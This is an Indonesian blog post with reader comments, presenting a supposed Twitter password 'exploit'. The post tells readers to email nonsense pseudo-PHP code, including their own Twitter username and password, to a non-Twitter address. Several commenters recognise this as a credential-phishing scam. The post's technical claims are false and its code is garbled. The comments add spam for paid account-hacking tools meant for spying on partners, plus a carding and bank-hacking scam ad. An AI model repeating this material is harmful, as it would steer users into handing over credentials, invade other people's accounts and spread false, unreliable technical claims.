Jumat, 21 Desember 2012

Cara Hack Password Twitter Tanpa Software

CARA KERJA HACKING AKUN TWITTER

Twitter memiliki dua database (satu untuk pria dan satu untuk pengguna perempuan) di mana mereka menyimpan semua informasi dari pengguna mereka, jika Anda ingat email yang Anda gunakan untuk login namun lupa sandi, Anda dapat menggunakan 'Lupa kata sandi Anda?' pilihan, namun jika seperti saya Anda tidak memiliki informasi yang tidak mungkin untuk memulihkan hukum account tersebut.


Jika Anda tahu apa-apa tentang website pemrograman Anda tahu 'Lupa kata sandi Anda?' berada dalam kontak langsung dengan database untuk mengirim permintaan untuk mengambil informasi yang terlupakan untuk Anda, pada dasarnya apa artinya adalah jika Anda bertanya 'database untuk informasi yang login dengan' kode 'hak (dalam kasus kami mengeksploitasi ), itu akan mengirimkan kembali informasi tersebut.

Jadi semua saya harus mencari tahu adalah apa kode dan apa sistem yang mereka digunakan untuk menghubungi database melalui 'Lupa kata sandi Anda?' layanan, setelah beberapa minggu menulis dan menguji kode saya datang dengan orang yang tepat untuk pekerjaan itu dan setelah melakukan sedikit riset saya belajar Twitter menggunakan sesuatu yang mirip dengan layanan email untuk menghubungi database mereka.

Tapi seperti biasa, semuanya tidak semudah tampaknya. Untuk alasan keamanan database diprogram untuk memverifikasi account Anda meminta adalah benar kepunyaan Anda dan tidak seseorang elses sehingga mereka membutuhkan beberapa jenis otentikasi atau verifikasi (thats mengapa mereka mengirimkan link verifikasi ke email Anda saat membuat account Anda atau mengubah password Anda) , untungnya bagi kami Twitter begitu buruk diprogram mereka juga memungkinkan Anda untuk menggunakan teman / pengikut account untuk memverifikasi sendiri (itu kesalahan dalam layanan "Teman Reksa / Pengikut" di mana mereka mengotentikasi account dengan memeriksa jika terkait teman / email pengikut terkait dengan account 'korban'), dengan kata lain, jika orang yang Anda ingin mendapatkan informasi login dari yang mengikuti Anda di Twitter dan mengikuti mereka ... Anda Anda dapat menggunakan akun Anda sendiri untuk memverifikasi mereka (dengan membingungkan database ke dalam berpikir kita memeriksa apakah Anda berdua saling mengikuti satu sama lain daripada tindakan yang benar reseting password mereka dan membuat mereka kirim pada kami) dan mendapatkan login email dan password yang dikirim ke Anda ... tapi korban harus mengikuti Anda dan Anda mereka

CARA MELAKUKANNYA

1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?

Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini

Hack Twitter

Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2.


2) Di bagian bawah halaman ini saya telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login korban .

Gulir ke bawah ke bagian bawah halaman ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks sehingga Anda dapat mengeditnya.

3) Setelah Anda memiliki kode di suatu tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga hal ke dalamnya, username twitter korban dan otentikasi informasi teman login. Saya akan memberikan contoh langkah demi langkah dengan mencoba memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian mana Anda harus mengedit dan dengan apa:

Hack Twitter

1. Harus username korban.
2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.

Saat mengedit kode, tidak sengaja menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi pastikan Anda menaruh informasi di dalamnya.

4) Sekarang bahwa Anda memiliki kode eksploitasi diedit dan siap untuk dikirim, kami siap untuk mengirimkannya ke database melalui email, karena bukan email biasa Anda, tetapi email mengeksploitasi kita harus menggunakan Subyek khusus sehingga database tahu bagaimana membaca dalam bahasa pemrograman.

Ke alamat email Anda dan Compose email baru untuk twittersupport@techie.com yang twitters pelanggan layanan email untuk password lupa, dalam salinan Subyek dan paste kode di bawah ini

$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

Setelah Anda mengedit Subjek dan memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar di bawah, saya akan berhitung setiap item:

Hack Twitter


1. Alamat email dari layanan pelanggan lupa database twitter itu password.
2. Di sinilah Anda memasukkan username korban.
3. Di sinilah Anda memasukkan jenis kelamin korban (seperti yang disebutkan di atas database twitter terbagi dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika mereka adalah laki-laki atau F jika mereka adalah perempuan.

5) Setelah Anda benar ditulis Kepada: dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email. Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database untuk mengirimkan kembali jawaban itu dengan informasi.

Ini harus mengambil dari 12-24 jam tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh dari respon email Anda akan menerima:

Hack Twitter

(Sorry Yang Bahasa Indonesia Hehehe, Bisa dipaahami gk? Klo gk tanya di comment)

THE EXPLOIT CODE

twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0]; 

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database." 

$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email 

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() { 
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; 
srand((double)microtime()*1000000); 
$i = 0; 
while ($i <= 7) { $num = decrypt() % 33; $tmp = substr($salt, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } mail($email_address, $subject, $message, "Twitter Password Reset Confirmation } /end$




Sekian Cara Hack Password Twitter Tanpa Software

90 komentar:

  1. kok gak lama banget ya gan dapet balasan email dari twitter??

    BalasHapus
    Balasan
    1. oohh...
      kirain yg bagus kyk softwarenya di www.PENGINTIP.com itu bro

      Hapus
    2. Komentar ini telah dihapus oleh administrator blog.

      Hapus
  2. Balasan
    1. Oooh hack akun twitter ya kak...
      Eh pernah jg sih kak menghack twitter lewat aplikasi hack twitter yg dari website www.EMPATMATA.net itu.
      Jdi intinya kita menjalankan aplikasi hack twitter itu, trus menghack/membobol akun twitter banyak orang, setelah dapet username ama passwordnya trus kita masuk atau login ke akun orang2 itu.
      Aman dan yg pasti bisa liat username ama passwordnya, trus klo udah login bisa deh baca2 pesan masuknya, ama liat2 posting2 yg dia private, wkwkwkwk...

      Harga aplikasi hack twitternya dari website www.EMPATMATA.net itu sih klo gak salah 100ribu atau 150ribu, lupa, tpi sekitar segitu deh.
      Ada banyak sih tinggal pilih, ada aplikasi hack twitter, fb, instagram, dll.
      Pas belinya di kolom alasan itu tulis aja buat yg baik2, jngn sampai alasan yg jelek2 kayak mau hack orang atau apa.
      Bilang aja mau buat benahin akun sendiri yg habis dihack orang yg gak brtanggungjawab.
      Klo alasan yg baik2 gitu yakin deh bakal dilayanin ama penjualnya yg di www.EMPATMATA.net itu..,,

      Hapus
    2. Wuihhhh Thanks kak @Risma sharingnya

      Mantabbbb aplikasi hack instagram, fb, twitter yg dr www.Empatmata.net

      Lancar bwt ngintipin dalemnya akun pasangan

      Thanks jg bocoran trik cara belinya

      Hapus
  3. yang ke 4 kurang ngerti nih , kasih tau dong

    BalasHapus
  4. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  5. berarti kalo belum di follback gabisa nge-hack dong ya?? :(

    BalasHapus
  6. kok aku udah coba,..terus twitterku gak bisa dibuka

    BalasHapus
  7. nipu nih kayaknya bro.. hati hati aja.

    BalasHapus
  8. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  9. saya tak faham~~ please ajar saya sbb twitter saya kene hack~pastu dia eiii geram plzzz ajar

    BalasHapus
  10. Artikelnya keren banget mas bro
    sangat bermanfaat

    BalasHapus
  11. seru ya hihihihihi ,tambah ilmu nih hack twitter , hack facebook , hack billing warnet

    BalasHapus
  12. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  13. ini bahasa indonesia asli atau pake gugel translate gan??

    BalasHapus
  14. ini palsu, percaya aja sih haha. masa mau kasih password lo ke orang ini? lol banget baca subject "YOUR USERNAME" "YOUR PASS" emang pentingnnya paket itu apa? lol -_-

    BalasHapus
  15. kalo ak udh nge-hack ntar yg ak hack tau ngk kalo yg nge hack ak?

    BalasHapus
  16. Kalo yang tulis2an di notepadnya di copy ke email gak? apa di save apa gimana?

    BalasHapus
  17. Intinya dari topik ini adalah, "CARA MENGHACK AKUN KITA SENDIRI DENGAN CARA MEMBERIKAN EMAIL KITA KEPADA PEMILIK AKUN EMAIL twittersupport@techie.com YANG MENGAKU SEBAGAI ADMINISTRATOR" karena admin itu pake @twitter.com, ya kalo kalian pinter pasti tau lah mau ngehack ko ngasih data akun kita, follower, dll PRREEETTT. Anak KECIL pun jadi hacker profesional kalo gini caranya.
    STUPID × IDIOT

    BalasHapus
  18. ini masih berlaku atau tidak ya? ._.

    BalasHapus
  19. gan tolong bantu,,,
    saya kurang paham dengan blog nya,,
    tolong bgt komfrm ke pin saya
    2a80eb0f

    BalasHapus
  20. aku gak ngerti, bisa minta tolong bobolin twitter orang gak? please, help me, i need you so much.. klo gak ya bisa kasih cara yg lebihhh mudah??

    BalasHapus
  21. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  22. #user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
    #user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
    kalo emang ngehack, kita sehrusnya gag perlu ngasi password kita sendiri kn??,,

    your username here & yourpasswordhere ngapain ada dsitu
    brarti itu meminta username & password kita..
    begoooooo......mau ngehack tp kita sendiri yg kena HACK

    BalasHapus
  23. wkwk okke kriswidiantono ternyata orang goblok :p
    buat yang komen diatas jelas ajalah gak ada email balesan dr twitter, orang itu emailnya dia, emailnya haduh email gratisan lg..
    terus kodenya lagi.. wkwk kode apaan tuh? saya yang belajar bahasa pemrograman dr dulu ngakak nih lihat itu.. bahasa paan coba tuh :DD
    gobloknya nanti pas dikirim emailnya, lu dapet username sama email kita lg, mana mau ngehack? lu lagi yang ngehack.. namanya metode phising.. phising lewat email
    gampang banget sih ditebak tipuannya wkwk goblokkkk penulisnya kek anak tk!!!!

    BalasHapus
  24. gan, itu password yang kita masukkan waktu di note pad itu password yang kita pengen kan?

    BalasHapus
  25. aturnhun mbaknya diatas yg sharing tntang www.dokterakun.blogpsot.com diatas... :)
    aquw dpt bonus 1 password kayaknya, 201 passwort
    wkwkwkwk

    BalasHapus
  26. kalo gak ngikutin satu sama lain bisa gak??

    BalasHapus
  27. Om, Pke Email apa untuk Ngirimnya ?

    BalasHapus
  28. jadi, kode eksploitasinya itu dimasukkan atau gak?

    BalasHapus
  29. Buat yg komen diatas tentang www.dokterakun.blogspot.com
    Saya tau kalau kamu baru keluar komunitas kita, tapi tolong tetap jaga rahasia.
    Ini rahasia komunitas, bagaimana kalau software trsebut dibeli orang yg tidak bertanggung jawab?

    BalasHapus
  30. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  31. ngga bisa ih caranya itu, aku coba gagal

    BalasHapus
  32. gan kog saya gak bisa, mau balikin twitter gua di hack orang org nii

    BalasHapus
  33. kk tolong jelasin lebih rinci cara ke 3 yang no 2 dan 3.
    thanks kk

    BalasHapus
  34. INIMAH PENIPU,AWAS KE HACK TWITTERNYA BRO !

    BalasHapus
  35. alamat email tujuan udah di banned ni sma server.. hahahaha

    BalasHapus
  36. beneran bisa atau malah kejebak ini?

    BalasHapus
  37. kok nipu ya? itu kenapa harus masukin password kita sendiri ? untung aja, belum dicoba

    BalasHapus
  38. http://gotuskul.blogspot.com => twitterhack => pojok kanan atas ketik %space twitter% => @twitteranda => Yes (hack) or No (cancel hack) => rating kasih bintang 5 kalo bintang 1 - 4 nanti follower anda yang ke hack => pojok kiri bawah ketik $okay$

    jangan disalah gunain, kalo nggak penting mending nggak usah, belajar lah sikap jujur dari sekarang :)

    BalasHapus
  39. ini bener? ntar kalau saya masukin email sama pass saya malah saya yang kena lagi

    BalasHapus
  40. haha hati hati masbro banyak tukang tipu keluyuran di dunia maya ;)

    BalasHapus
  41. dibalesnya failure mulu bang dari twitternya

    BalasHapus
  42. terima kasih infonya gan
    kunjungi balik ya http://santosa-barca.blogspot.com

    BalasHapus
  43. gak berhasil gan...
    ini keterangannya:
    Delivery to the following recipient failed permanently:

    twittersupport@techie.com

    Technical details of permanent failure:
    Google tried to deliver your message, but it was rejected by the server for the recipient domain techie.com by mx00.gmx.com. [74.208.5.4].

    The error that the other server returned was:
    550 Requested action not taken: mailbox unavailable

    ----- Original message -----

    DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
    d=gmail.com; s=20120113;
    h=mime-version:date:message-id:subject:from:to:content-type;
    bh=dRYfRsktWOnVj2mRuUXzIqz60hZ2OaLQOFp8/jLHzu8=;
    b=w9kX6KDauKV4NHJGLNaqC3LpgU8Iv0fwIURBHHk3DqeAo8sWRwMzCVFbtR2O6rOKBU
    W8PzDMiPpKMDG8I9dOX/zFKu7sPI9SHzeHMxicyA9iSxepISbyzM1yBcoHv3wN2OrDih
    k+GWMs0m7sMzz288ub71kdxaoh12/n4MYgSXsvLy7zQwGRu8ZW+5t3DpzL/OOQzpG/kD
    eeRwiyRVzzFpy9zFImiUESZWwH04R2Z2jG2ePTeJVmnvqdMducMq9OT80/Ac3NM0KsPr
    ZBxT69Q2kaS5KEI07//r16oFhZzq/H9XcQibqyL83r4TB0UNsUqPK1OP/wSLrGtDZ8cX
    OWOA==
    MIME-Version: 1.0
    X-Received: by 10.42.43.136 with SMTP id x8mr600066ice.85.1393253083829; Mon,
    24 Feb 2014 06:44:43 -0800 (PST)
    Received: by 10.64.65.167 with HTTP; Mon, 24 Feb 2014 06:44:43 -0800 (PST)
    Date: Mon, 24 Feb 2014 21:44:43 +0700
    Message-ID:
    Subject: $[search_database = $find user+id= "kebandungan", '%verification+user+gender'
    = }"M"{ begin_search();
    From: Pulang Pundung
    To: twittersupport@techie.com
    Content-Type: multipart/alternative; boundary=bcaec519693724dadc04f32803eb

    BalasHapus
  44. sopwere di WWW.INDONESOFT.BLOGSPOT.COM mantab abis broooowwww

    BalasHapus
  45. min kalo dapet balasan dari emailnya gini gimana nih?
    Sorry, we were unable to deliver your message to the following address.

    :
    Remote host said: 550 Requested action not taken: mailbox unavailable [RCPT_TO]

    --- Below this line is a copy of the message.
    blablablablablablabla...... panjang dah ampe planet pluto kata2nya..

    BalasHapus
  46. gan Giroud:
    software hack di www.INDONESOFT.blogspot.com itu cuma bs ngedapetin 217 password ya?
    kmrn ane beli kok softwerenya cuma bisa dapetin password segitu?
    tapi sipdeh

    BalasHapus
  47. Guoblog,. ,itu mah akal akalan,. supaya id sama password lu masuk ke email dia,. >.< mau nipu,. -_-

    BalasHapus
  48. Cara terbaru : ane udah nyobain sendiri ,, cobain deh gan

    CARA MELAKUKANNYA

    1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?

    Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini

    Hack Twitter

    Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2.


    2) Di bagian bawah halaman ini saya telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login korban .

    Gulir ke bawah ke bagian bawah halaman ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks sehingga Anda dapat mengeditnya.

    3) Setelah Anda memiliki kode di suatu tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga hal ke dalamnya, username twitter korban dan otentikasi informasi teman login. Saya akan memberikan contoh langkah demi langkah dengan mencoba memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian mana Anda harus mengedit dan dengan apa:




    1. Harus username korban.
    2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
    3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.

    Saat mengedit kode, tidak sengaja menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi pastikan Anda menaruh informasi di dalamnya.

    4) Sekarang bahwa Anda memiliki kode eksploitasi diedit dan siap untuk dikirim, kami siap untuk mengirimkannya ke database melalui email, karena bukan email biasa Anda, tetapi email mengeksploitasi kita harus menggunakan Subyek khusus sehingga database tahu bagaimana membaca dalam bahasa pemrograman.

    Ke alamat email Anda dan Compose email baru untuk twittersupport@techie.com yang twitters pelanggan layanan email untuk password lupa, dalam salinan Subyek dan paste kode di bawah ini

    $[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

    Setelah Anda mengedit Subjek dan memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar di bawah, saya akan berhitung setiap item:




    1. Alamat email dari layanan pelanggan lupa database twitter itu password.
    2. Di sinilah Anda memasukkan username korban.
    3. Di sinilah Anda memasukkan jenis kelamin korban (seperti yang disebutkan di atas database twitter terbagi dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika mereka adalah laki-laki atau F jika mereka adalah perempuan.

    5) Setelah Anda benar ditulis Kepada: dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email. Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database untuk mengirimkan kembali jawaban itu dengan informasi.

    Ini harus mengambil dari 12-24 jam tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh dari respon email Anda akan menerima:




    THE EXPLOIT CODE : sama kaya yang di atas

    BalasHapus
  49. kok kata nya gagal permanent....

    BalasHapus
  50. Untung internet gua error men -_- kontol lu ah kalo mau nipu!

    BalasHapus
  51. hahaha...gila...
    gampang amat trnyata hack fb,twitter,yahoo, dll
    cobain softwarenya gan di www.indonesoft.net
    ya walopun bayar skitar 50rb sampe 100rb sih
    tp siplah, buat jail ngintipin inbox tmn2 kampus gue, wkwkwkwk

    BalasHapus
  52. kamftet :v mending gw buat phising , add fb gw juga Woles Part VII << jiah numpang promosi :v

    BalasHapus
  53. yg udah beli di www.INDONESOFT.net
    nih ane barusan beli softwarenya disitu juga,
    software nmr 1 sampai 3 udah berhasil sukses dapetin password"
    yg software nmr 4 ane masih agak bingung gunainnya
    hehe maklum newbie, tolong ajarin dong

    BalasHapus
  54. yg udah beli di www.INDONESOFT.net
    nih ane barusan beli softwarenya disitu juga,
    software nmr 1 sampai 3 udah berhasil sukses dapetin password"
    yg software nmr 4 ane masih agak bingung gunainnya
    hehe maklum newbie, tolong ajarin dong

    BalasHapus
  55. thank infornya bermanfaat

    http://obatkatarakobatkatarak.wordpress.com/

    BalasHapus
  56. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  57. penipu njing ae... berapa harga diri kamu pembuat blog.... sini ku bayar,, dari pada jadi penipu

    BalasHapus
  58. banyak yang kelihangan akun ya bro/sis gw kasih saran pakai software dari softwaremurahlink.blogspot.com keren deh bro akun hilang bisa kembali dalam waktu 5 menit. Cara menggunakanpun mudah keren dehhh

    BalasHapus
  59. udah ada yg nyobain softwarenya www.terlacak.com apa blm?
    software yg ke 1 2 3 udah saya test dan mantab
    yg software 4 blm saya test

    BalasHapus
  60. Mending coba ini deh bro, bisa dapet puluhan juta cuma modal Android doang!
    http://taufandroid.blogspot.com/2015/02/cara-cepat-menghasilkan-uang.html

    BalasHapus
  61. TKS infonya mas
    www.vitalitastangerang.com

    BalasHapus
  62. Are you in a financial crisis, looking for money to start your own business or to pay your bills?
    GET YOUR BLANK ATM CREDIT CARD AT AFFORDABLE PRICE*
    We sell this card to all our customers and interested buyers worldwide,Tho card has a daily withdrawal limit of $5000 and up to $50,000 spending limit in stores and unlimited on POS.
    **WHAT WE OFFER**
    *1)WESTERN UNION TRANSFERS/MONEY GRAM TRANSFER*
    *2)BANKS LOGINS*
    *3)BANKS TRANSFERS*
    *4)CRYPTO CURRENCY MINNING*.
    *5)BUYING OF GIFT CARDS*,
    *6)LOADING OF ACCOUNTS*
    *7)WALMART TRANSFERS*
    *8)BITCOIN INVESTMENTS*
    *9)REMOVING OF NAME FROM DEBIT RECORD AND CRIMINAL RECORD*
    *10)BANK HACKING*
    email blankatmhacker007@yahoo.com
    you can also call or whatsapp us Contact us today for more enlightenment

    +1 (620) 307-3174
    WE ARE REAL AND LEGIT...........2019 FUNDS/FORGET ABOUT GETTING A LOAN..

    IT HAS BEEN TESTED AND TRUSTED

    whatsapp only ===>> +1 (620) 307-3174
    Cheap as $200

    BalasHapus
  63. Cara Hack Password Twitter Tanpa Software ~ Okke Kriswidianto >>>>> Download Now

    >>>>> Download Full

    Cara Hack Password Twitter Tanpa Software ~ Okke Kriswidianto >>>>> Download LINK

    >>>>> Download Now

    Cara Hack Password Twitter Tanpa Software ~ Okke Kriswidianto >>>>> Download Full

    >>>>> Download LINK

    BalasHapus